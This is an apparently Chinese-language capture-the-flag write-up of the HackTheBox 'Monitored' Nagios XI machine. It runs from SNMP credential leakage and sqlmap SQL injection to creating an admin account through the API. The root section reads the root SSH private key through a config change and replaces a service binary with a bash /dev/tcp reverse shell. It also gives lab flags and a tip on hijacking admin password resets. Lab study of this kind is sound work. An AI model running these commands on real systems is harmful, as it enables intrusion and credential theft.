[Meachines][Medium]Monitored

Main

$ nmap -p- -sC -sV 10.10.11.248 --min-rate 1000

image.png

# echo "10.10.11.248 nagios.monitored.htb" >>/etc/hosts

image.png

image.png

image.png

  • Nagios 是一个流行的开源网络监控系统,用于监控计算机系统、网络设备、服务以及应用程序。它可以实时监控主机和服务的状态,及时发现和报告问题,从而帮助管理员快速诊断和解决网络和系统方面的故障。

通过漏洞库查询到存在一个SQL注入
CVE-2023–40933

image.png

image.png

image.png

$ nmap -sU -sC -sV 10.10.11.248 --min-rate 1000

image.png

  • SNMP(Simple Network Management Protocol)是一种用于管理和监控网络设备的标准协议。它允许网络管理员远程监视网络设备的运行状态、收集性能数据、配置设备以及诊断问题。通过SNMP,管理员可以从网络设备(如路由器、交换机、服务器等)中获取信息,也可以向这些设备发送控制命令。SNMP使用一个基于文本的数据格式来交换信息,通常被用于监控和管理大型企业网络。

$ snmpwalk -v2c -c public nagios.monitored.htb
从结果中发现了了登录凭据svc XjH7VCehowpR1xZB

image.png

  • snmpbulkwalk 是一个基于命令行的工具,用于执行 SNMP(Simple Network Management Protocol)的批量查询。它通常用于获取大量的网络设备信息,比如路由器、交换机等。与标准的 snmpwalk 工具相比,snmpbulkwalk 通过在单个请求中获取多个变量来提高效率,减少了网络交互的次数,因此对于大型网络或者需要获取大量信息的情况下更加高效。snmpbulkwalk 工具允许用户指定要查询的设备、OID(Object Identifier)以及相关的认证参数,以便获取所需的网络设备信息

https://nagios.monitored.htb/nagiosxi/includes/components/ccm/index.php

image.png

https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php

image.png

页面存在

$ curl -X POST -k -L -d 'username=svc&password=XjH7VCehowpR1xZB' https://nagios.monitored.htb/nagiosxi/api/v1/authenticate/

我们可以通过这个接口来获取TOKEN

image.png

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch --dbs

image.png

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --tables

image.png

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump

image.png

我们将通过这个APIKEY来添加一个用户

$ curl -XPOST 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1' -d 'username=s-h4ck13&password=maptnh&email=maptnh@maptnh.com&name=mapth&auth_level=admin' -k
image.png

登录后台https://nagios.monitored.htb/nagiosxi/login.php
如果是真实环境在这里其实可在SQL数据库中修改管理员的邮箱,让后忘记密码,这样发送的重置密码就会到攻击者邮箱验证修改
username:s-h4ck13
password:maptnh

image.png

Configure->Core Config Manager->Commands->Add New

image.png

image.png

image.png

选择命令后,点击右下角Run Check Command

image.png

image.png

image.png

User Flag

/home/nagios$ cat user.txt

image.png

39ea0ded58be8ba1cf84a3f332e5757e

Root Flag

$ sudo -l

image.png

方法1

$ cat /usr/local/nagiosxi/scripts/components/getprofile.sh

我们将内容复制下来分析

image.png

在277行发现一个文件我们有权限进行修改

image.png

image.png

$ cat /usr/local/nagios/etc/nagios.cfg

image.png

$ vi /usr/local/nagios/etc/nagios.cfg
把log_file=/usr/local/nagios/var/nagios.log修改成log_file=/root/.ssh/id_rsa

image.png

$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1

image.png

[靶机]

$ cd /usr/local/nagiosxi/var/components
$ /usr/local/nagiosxi/var/components$ python -m http.server 7890

[Kali]

$ wget http://10.10.11.248:7890/profile.zip
$ unzip profile.zip
目录profile-1714316974/nagios-logs/nagios.txt已经读取到root用户的私钥
image.png

$ cd profile-1714316974/nagios-logs;mv nagios.txt id_rsa;chmod 400 id_rsa;ssh -i id_rsa root@10.10.11.248

image.png

4c45fe55bd0f2f1364c07760c92af9d8

方法2

[靶机]

$ ls /usr/local/nagiosxi/scripts/ -la

image.png

$ cd /usr/local/nagiosxi/scripts/

$ cat manage_services.sh

用于操作服务的

image.png

我们可以控制启动npcd服务来反弹一个shell

  • npcd 是 Nagios XI 中的一个守护进程(daemon),用于执行网络设备的自动发现和监控。Nagios 是一个流行的开源网络监控工具,Nagios XI 是 Nagios 的商业版本,提供了更多功能和易用性。

image.png

$ systemctl status npcd

找到服务位置

image.png

$ sudo ./manage_services.sh stop npcd

$ systemctl status npcd

image.png

$ rm /usr/local/nagios/bin/npcd

我们可以手动删除这个npcd,

image.png

我们可以看之前的权限,我们所在组是具有高权限的,可以进行删除该文件

image.png

$ vi /usr/local/nagios/bin/npcd
劫持该服务

#!/bin/bash
 bash -i >& /dev/tcp/10.10.16.23/10034 0>&1

$ chmod +x /usr/local/nagios/bin/npcd

方法2-1

$ sudo ./manage_services.sh start npcd

image.png

image.png

4c45fe55bd0f2f1364c07760c92af9d8

方法2-2

值得庆幸的是在/usr/local/nagiosxi/scripts/components/getprofile.sh调用了这个可执行文件

image.png

$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1

image.png

image.png

4c45fe55bd0f2f1364c07760c92af9d8

  • 26
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值